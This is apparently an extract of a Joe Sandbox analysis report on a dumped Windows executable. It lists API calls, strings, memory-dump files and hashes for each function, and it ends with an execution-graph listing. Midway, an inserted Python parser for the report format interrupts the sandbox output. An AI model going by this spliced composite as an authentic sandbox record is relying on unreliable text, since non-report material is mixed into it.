                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0099350C,1AC349E8,00000000,?,?,009943F5,?,?,?,00000000), ref: 009A129A
                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 009A12D4
                                                              • _wcslen.LIBCMT ref: 009A12DF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FoldString$H_prolog3Version_wcslen
                                                              • String ID:
                                                              • API String ID: 535866816-0
                                                              • Opcode ID: 57b1fbdc6ab48b73102ebe8006a0cb94a110ecbdbfd1a2293e1c503a51473805
                                                              • Instruction ID: 81da0c6d99311cef318ee70f41626dce7be404662811053c7373ddfa0c72b3cf
                                                              • Opcode Fuzzy Hash: 57b1fbdc6ab48b73102ebe8006a0cb94a110ecbdbfd1a2293e1c503a51473805
                                                              • Instruction Fuzzy Hash: B7115471A11126ABDF009FA98D45BAF7B69AF45720F100209F920E72D1CF609940CAE1
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009C198B,00000000,00000000,00000000,00000000,?,009C1B88,00000006,FlsSetValue), ref: 009C1A16
                                                              • GetLastError.KERNEL32(?,009C198B,00000000,00000000,00000000,00000000,?,009C1B88,00000006,FlsSetValue,009D0DD0,FlsSetValue,00000000,00000364,?,009C00D7), ref: 009C1A22
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C198B,00000000,00000000,00000000,00000000,?,009C1B88,00000006,FlsSetValue,009D0DD0,FlsSetValue,00000000), ref: 009C1A30
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: da0102a3df7e1dcc5b9a172b1ff500bc33b80c504889709e410485aea39f6250
                                                              • Instruction ID: 8d8b4513fc549583839476d8260e291555fa2f4184e718132fb97d3e177ad214
                                                              • Opcode Fuzzy Hash: da0102a3df7e1dcc5b9a172b1ff500bc33b80c504889709e410485aea39f6250
                                                              • Instruction Fuzzy Hash: 0201FC72E5B222ABCB218A689C44F567B9CAF567A1B110528F90ED7241C720DC00C6FD
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A1310
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,009A17FB,?,?,\\?\,1AC349C0,?,?,?,00000000,009CA279,000000FF), ref: 009A1319
                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,009CA279,000000FF), ref: 009A1348
                                                              • _wcslen.LIBCMT ref: 009A1351
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$H_prolog3_wcslen
                                                              • String ID:
                                                              • API String ID: 19219720-0
                                                              • Opcode ID: 7328258c02e1357922773d69e4c993a5f8b97db1397c206fa7e84f3ba6bc6ea3
                                                              • Instruction ID: 6f21b7c90a979cf4c2adb6398c9094a832480216efc72263981bd2b659649bad
                                                              • Opcode Fuzzy Hash: 7328258c02e1357922773d69e4c993a5f8b97db1397c206fa7e84f3ba6bc6ea3
                                                              • Instruction Fuzzy Hash: D3018F71D0011AAB8F10EFB88A45ABFBB7DAF82720B150209B511A7241DF34590096E1
                                                              APIs
                                                              • SleepConditionVariableCS.KERNELBASE(?,009B62BB,00000064), ref: 009B6341
                                                              • LeaveCriticalSection.KERNEL32(009E60E0,?,?,009B62BB,00000064,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B634B
                                                              • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,009B62BB,00000064,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B635C
                                                              • EnterCriticalSection.KERNEL32(009E60E0,?,009B62BB,00000064,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B6363
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                              • String ID:
                                                              • API String ID: 3269011525-0
                                                              • Opcode ID: 9d981c6387bf6ad0e19862c5ef1e64c551f7d7232e552748ac8ad8421dcc6855
                                                              • Instruction ID: 2395c0b3052705d6391fd04b836ac3b3c36d34619ed4f91306c28fb6a21325b6
                                                              • Opcode Fuzzy Hash: 9d981c6387bf6ad0e19862c5ef1e64c551f7d7232e552748ac8ad8421dcc6855
                                                              • Instruction Fuzzy Hash: 0BE09232958274EBCF121B93EC09F9D7F68BB44BE2B044014F50AA6160C6616E10BBD4
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 009AEB77
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 009AEB86
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009AEB94
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 009AEBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: f57db7b703e829cb1125878d51fa55c0d65b42f7cafea2aa3758269b9bfcef34
                                                              • Instruction ID: a05067562ae7ab85dc2140a6d85ef3ba64ae77baf73bb90df336514879944f38
                                                              • Opcode Fuzzy Hash: f57db7b703e829cb1125878d51fa55c0d65b42f7cafea2aa3758269b9bfcef34
                                                              • Instruction Fuzzy Hash: C6E0EC3596EFA0EBD6212BB0BD8DB867A54AB1ABA3F010141F601AE190C6A04C019B92
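The records above are emitted one per analysed function, each with the same blocks (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity). The parser below, added here as an example and not Joe Sandbox code or a Joe Sandbox API, turns that listing into structured records so the API usage of a dumped image can be indexed and triaged offline. It assumes only the line shapes visible on this page: headings on their own line, bullet entries, `Name.MODULE(args), ref: ADDR` API lines optionally prefixed `Part of subcall function ADDR:`, `value, xrefs: ADDR` string lines, and `Instruction Fuzzy Hash` as the last field of every record. The sample input is constructed by abbreviating two records from this page, and the watch-list passed to `records_calling` is the analyst's own choice, not a report field.

```python
# Added example: parser for the Joe Sandbox function-record listing on this page.
# Not Joe Sandbox code. Assumes only the line shapes visible in the report.
from __future__ import annotations
import re
from dataclasses import dataclass, field

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>[\w?@$]+)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)
STRING_RE = re.compile(r"^(?P<value>.*?), xrefs: (?P<xrefs>[0-9A-F]+(?:, [0-9A-F]+)*)$")
LINK_RESIDUE = "Download File"  # link label fused onto 'Associated:' entries by page extraction


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]            # '?' marks an argument the plugin could not resolve
    ref: str                   # call-site address inside the dumped image
    parent: str | None = None  # set for 'Part of subcall function' entries


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, list[str]]] = field(default_factory=list)  # (value, xrefs)
    associated: list[str] = field(default_factory=list)                 # associated .sdmp files
    fields: dict[str, str] = field(default_factory=dict)                # Source File, API ID, hashes

    def api_names(self) -> set[str]:
        return {c.name for c in self.apis}


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:                 # a heading opens a record if none is open
            if cur is None:
                cur = FunctionRecord()
            section = line
        elif line.startswith("•") and cur is not None:
            entry = line.lstrip("• ").strip()
            if section == "APIs":
                m = API_RE.match(entry)
                if m:
                    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                    cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            elif section == "Strings":
                m = STRING_RE.match(entry)
                if m:
                    cur.strings.append((m["value"], m["xrefs"].split(", ")))
            else:
                key, _, value = entry.partition(":")
                value = value.strip().removesuffix(LINK_RESIDUE)
                if key == "Associated":
                    cur.associated.append(value)
                else:
                    cur.fields[key] = value
                if key == "Instruction Fuzzy Hash":  # last field of a record: close it
                    records.append(cur)
                    cur, section = None, None
    return records


def api_index(records: list[FunctionRecord]) -> dict[str, list[tuple[int, str]]]:
    """API name -> [(record number, call-site address)] across all records."""
    index: dict[str, list[tuple[int, str]]] = {}
    for i, rec in enumerate(records):
        for call in rec.apis:
            index.setdefault(call.name, []).append((i, call.ref))
    return index


def records_calling(records: list[FunctionRecord], watch: set[str]) -> list[int]:
    """Record numbers whose API set intersects an analyst-supplied watch-list."""
    return [i for i, r in enumerate(records) if r.api_names() & watch]


# Constructed sample: two records from this page with argument lists shortened.
SAMPLE = """\
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?), ref: 009A7484
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 009A749E
Strings
• Thread pool initialization failed., xrefs: 009A74B6
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• Instruction Fuzzy Hash: 6C11A7B1648705AFD3315FAA9C859A7FFDDEB99744F10482EF1D9C2210D67059408B50
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 009C3685
• __freea.LIBCMT ref: 009C3729
  • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?), ref: 009C0440
Strings
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• Instruction Fuzzy Hash: 1C31D2B1E0020AABDF249F65DC81EEE7BA9EB44350F04812CFC04D6251EB36CE51CB91
"""
```

Paste a full report section into `parse_records` and use `api_index` to jump from an API name to every call site the plugin recorded; `records_calling` narrows the listing to functions touching whichever APIs the analyst is hunting for. The parser also drops the "Download File" link label that page extraction fuses onto the `Associated:` file names, so the recovered .sdmp names match the dump files themselves.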
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 009A8294
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 009B087E: __EH_prolog3_GS.LIBCMT ref: 009B0885
                                                                • Part of subcall function 009B087E: GetLastError.KERNEL32(0000001C,009A8244,?,00000000,00000086,?,1AC349C0,?,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B089D
                                                                • Part of subcall function 009B087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B08D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                              • String ID: %ls
                                                              • API String ID: 1279724102-3246610740
                                                              APIs
                                                                • Part of subcall function 009AEBAA: GetDC.USER32(00000000), ref: 009AEBAE
                                                                • Part of subcall function 009AEBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 009AEBB9
                                                                • Part of subcall function 009AEBAA: ReleaseDC.USER32(00000000,00000000), ref: 009AEBC4
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 009AEF65
                                                                • Part of subcall function 009AF1EC: GetDC.USER32(00000000), ref: 009AF1F5
                                                                • Part of subcall function 009AF1EC: GetObjectW.GDI32(?,00000018,?), ref: 009AF224
                                                                • Part of subcall function 009AF1EC: ReleaseDC.USER32(00000000,?), ref: 009AF2BC
                                                              Strings
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: (
                                                              • API String ID: 1061551593-3887548279
                                                              APIs
                                                              • _free.LIBCMT ref: 009C1FD4
                                                                • Part of subcall function 009BACBB: IsProcessorFeaturePresent.KERNEL32(00000017,009BAC8D,009B535E,?,?,00000000,009B535E,00000016,?,?,009BAC9A,00000000,00000000,00000000,00000000,00000000), ref: 009BACBD
                                                                • Part of subcall function 009BACBB: GetCurrentProcess.KERNEL32(C0000417,?,009B535E), ref: 009BACDF
                                                                • Part of subcall function 009BACBB: TerminateProcess.KERNEL32(00000000,?,009B535E), ref: 009BACE6
                                                              Strings
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              APIs
                                                                • Part of subcall function 009A79F7: GetSystemTime.KERNEL32(?,00000000), ref: 009A7A0F
                                                                • Part of subcall function 009A79F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 009A7A1D
                                                                • Part of subcall function 009A79A0: __aulldiv.LIBCMT ref: 009A79A9
                                                              • __aulldiv.LIBCMT ref: 0099F162
                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,1AC349C0,?,?,00000000,?,00000000,009C9F3D,000000FF), ref: 0099F169
                                                                • Part of subcall function 00991150: _wcslen.LIBCMT ref: 0099115B
                                                              Strings
                                                              Similarity
                                                              • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                              • String ID: .rartemp
                                                              • API String ID: 3789791499-2558811017
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009ADAD5
                                                                • Part of subcall function 009A0360: __EH_prolog3.LIBCMT ref: 009A0367
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Shell.Explorer$about:blank
                                                              • API String ID: 431132790-874089819
                                                              APIs
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000001), ref: 009B017B
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 009B01B9
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              APIs
                                                                • Part of subcall function 009A5094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009A50B3
                                                                • Part of subcall function 009A5094: GetProcAddress.KERNEL32(009E51F8,CryptUnprotectMemory), ref: 009A50C3
                                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,009A5104), ref: 009A5197
                                                              Strings
                                                              • CryptUnprotectMemory failed, xrefs: 009A518F
                                                              • CryptProtectMemory failed, xrefs: 009A514E
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              APIs
                                                              • IsWindowVisible.USER32(000103EA), ref: 009B4291
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,000103EA,009B0110,?), ref: 009B42BA
                                                              Strings
                                                              Similarity
                                                              • API ID: DialogParamVisibleWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 3157717868-3292211884
                                                              APIs
                                                                • Part of subcall function 009A3EAA: _swprintf.LIBCMT ref: 009A3EEA
                                                                • Part of subcall function 009A3EAA: _strlen.LIBCMT ref: 009A3F0B
                                                                • Part of subcall function 009A3EAA: SetDlgItemTextW.USER32(?,009D919C,?), ref: 009A3F64
                                                                • Part of subcall function 009A3EAA: GetWindowRect.USER32(?,?), ref: 009A3F9A
                                                                • Part of subcall function 009A3EAA: GetClientRect.USER32(?,?), ref: 009A3FA6
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                              • SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0
                                                              • API String ID: 2622349952-4108050209
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,009A770A,?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75F3
                                                              • GetLastError.KERNEL32(?,?,009A777F,?,?,?,?,?,009A7769), ref: 009A75FF
                                                                • Part of subcall function 009992EB: __EH_prolog3_GS.LIBCMT ref: 009992F2
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009A7608
                                                              Similarity
                                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 2419225763-2248577382
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,1AC349C0), ref: 009A3E65
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 009A3E73
                                                              Strings
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: fb777bb5e6c9b2da1305e2047fda6addd82dff75395a4889fd47dca0f9692ddb
                                                              • Instruction ID: 8b6d4a5ba8f139f06a6c8d209a7fb2c8fb14a4faac6e24dcd8b7cd3ef5c1bf7b
                                                              • Opcode Fuzzy Hash: fb777bb5e6c9b2da1305e2047fda6addd82dff75395a4889fd47dca0f9692ddb
                                                              • Instruction Fuzzy Hash: F7C012B1E5431096EB3057717C0DF432D585B05715F05045CF50D994C0D5E5D8418BD0

                                                              Execution Graph

                                                              Execution Coverage:3.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.6%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:51
                                                              execution_graph 98160 c51044 98165 c52735 98160->98165 98162 c5104a 98201 c70433 29 API calls __onexit 98162->98201 98164 c51054 98202 c529da 98165->98202 98169 c527ac 98212 c5bf07 98169->98212 98172 c5bf07 8 API calls 98173 c527c0 98172->98173 98174 c5bf07 8 API calls 98173->98174 98175 c527ca 98174->98175 98176 c5bf07 8 API calls 98175->98176 98177 c52808 98176->98177 98178 c5bf07 8 API calls 98177->98178 98179 c528d4 98178->98179 98217 c52d5e 98179->98217 98183 c52906 98184 c5bf07 8 API calls 98183->98184 98185 c52910 98184->98185 98238 c630e0 98185->98238 98187 c5293b 98248 c530ed 98187->98248 98189 c52957 98190 c52967 GetStdHandle 98189->98190 98191 c939c1 98190->98191 98192 c529bc 98190->98192 98191->98192 98193 c939ca 98191->98193 98195 c529c9 OleInitialize 98192->98195 98255 c7016b 98193->98255 98195->98162 98196 c939d1 98264 cc09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98196->98264 98198 c939da 98201->98164 98266 c52a33 98202->98266 98205 c52a33 8 API calls 98206 c52a12 98205->98206 98207 c5bf07 8 API calls 98206->98207 98208 c52a1e 98207->98208 98273 c584b7 98208->98273 98210 c5276b 98211 c53205 6 API calls 98210->98211 98211->98169 98213 c7019b 8 API calls 98212->98213 98214 c5bf1c 98213->98214 98215 c7016b 8 API calls 98214->98215 98216 c527b6 98215->98216 98216->98172 98218 c5bf07 8 API calls 98217->98218 98219 c52d6e 98218->98219 98220 c5bf07 8 API calls 98219->98220 98221 c52d76 98220->98221 98222 c5bf07 8 API calls 98221->98222 98223 c52d91 98222->98223 98224 c7016b 8 API calls 98223->98224 98225 c528de 98224->98225 98226 c5318c 98225->98226 98227 c5319a 98226->98227 98228 c5bf07 8 API calls 98227->98228 98229 c531a5 98228->98229 98230 c5bf07 8 API calls 98229->98230 98231 c531b0 98230->98231 98232 c5bf07 8 API calls 98231->98232 98233 c531bb 98232->98233 98234 c5bf07 8 API calls 98233->98234 98235 c531c6 98234->98235 
98236 c7016b 8 API calls 98235->98236 98237 c531d8 RegisterWindowMessageW 98236->98237 98237->98183 98239 c63121 98238->98239 98242 c630fd 98238->98242 98308 c705d2 5 API calls __Init_thread_wait 98239->98308 98247 c6310e 98242->98247 98310 c705d2 5 API calls __Init_thread_wait 98242->98310 98243 c6312b 98243->98242 98309 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98243->98309 98244 c69ec7 98244->98247 98311 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98244->98311 98247->98187 98249 c93c69 98248->98249 98250 c530fd 98248->98250 98312 cc3b63 8 API calls 98249->98312 98252 c7016b 8 API calls 98250->98252 98253 c53105 98252->98253 98253->98189 98254 c93c74 98256 c70170 ___std_exception_copy 98255->98256 98257 c7018a 98256->98257 98260 c7018c 98256->98260 98313 c7523d 7 API calls 2 library calls 98256->98313 98257->98196 98259 c709fd 98315 c73634 RaiseException 98259->98315 98260->98259 98314 c73634 RaiseException 98260->98314 98262 c70a1a 98262->98196 98264->98198 98267 c5bf07 8 API calls 98266->98267 98268 c52a3e 98267->98268 98269 c5bf07 8 API calls 98268->98269 98270 c52a46 98269->98270 98271 c5bf07 8 API calls 98270->98271 98272 c52a08 98271->98272 98272->98205 98274 c965bb 98273->98274 98275 c584c7 _wcslen 98273->98275 98295 c596d9 98274->98295 98278 c58502 98275->98278 98279 c584dd 98275->98279 98277 c965c4 98277->98277 98281 c7016b 8 API calls 98278->98281 98285 c58894 8 API calls 98279->98285 98282 c5850e 98281->98282 98286 c7019b 98282->98286 98284 c584e5 __fread_nolock 98284->98210 98285->98284 98287 c7016b ___std_exception_copy 98286->98287 98288 c7018a 98287->98288 98291 c7018c 98287->98291 98299 c7523d 7 API calls 2 library calls 98287->98299 98288->98284 98290 c709fd 98301 c73634 RaiseException 98290->98301 98291->98290 98300 c73634 RaiseException 98291->98300 98293 c70a1a 98293->98284 98296 c596e7 98295->98296 98298 c596f0 __fread_nolock 98295->98298 98296->98298 98302 c5c269 98296->98302 98298->98277 
98299->98287 98300->98290 98301->98293 98303 c5c27c 98302->98303 98304 c5c279 __fread_nolock 98302->98304 98305 c7016b 8 API calls 98303->98305 98304->98298 98306 c5c287 98305->98306 98307 c7019b 8 API calls 98306->98307 98307->98304 98308->98243 98309->98242 98310->98244 98311->98247 98312->98254 98313->98256 98314->98259 98315->98262 98317 ca1a68 98318 ca1a70 98317->98318 98321 c5d4e5 98317->98321 98363 cb79af 8 API calls __fread_nolock 98318->98363 98320 ca1a82 98364 cb7928 8 API calls __fread_nolock 98320->98364 98324 c7016b 8 API calls 98321->98324 98323 ca1aac 98365 c602f0 98323->98365 98326 c5d539 98324->98326 98347 c5c2cd 98326->98347 98327 ca1ad3 98328 ca1ae7 98327->98328 98388 cd60a2 53 API calls _wcslen 98327->98388 98332 c7016b 8 API calls 98335 c5d61e messages 98332->98335 98333 ca1b04 98333->98321 98389 cb79af 8 API calls __fread_nolock 98333->98389 98340 ca1f1c 98335->98340 98342 ca1f37 98335->98342 98343 c5be6d 8 API calls 98335->98343 98344 c5c34b 8 API calls 98335->98344 98345 c5d8c1 messages 98335->98345 98390 c5b3fe 98335->98390 98338 c5d95c messages 98346 c5d973 98338->98346 98362 c6e284 8 API calls messages 98338->98362 98394 cb55d9 8 API calls messages 98340->98394 98343->98335 98344->98335 98345->98338 98354 c5c34b 98345->98354 98351 c5c2dd 98347->98351 98348 c5c2e5 98348->98332 98349 c7016b 8 API calls 98349->98351 98350 c5bf07 8 API calls 98350->98351 98351->98348 98351->98349 98351->98350 98352 c5c2cd 8 API calls 98351->98352 98395 c5be6d 98351->98395 98352->98351 98355 c5c359 98354->98355 98361 c5c381 messages 98354->98361 98356 c5c367 98355->98356 98357 c5c34b 8 API calls 98355->98357 98358 c5c34b 8 API calls 98356->98358 98359 c5c36d 98356->98359 98357->98356 98358->98359 98359->98361 98399 c5c780 98359->98399 98361->98338 98362->98338 98363->98320 98364->98323 98383 c60326 messages 98365->98383 98366 c70433 29 API calls pre_c_initialization 98366->98383 98367 c7016b 8 API calls 98367->98383 98368 ca62cf 98409 cc3ef6 81 API calls 
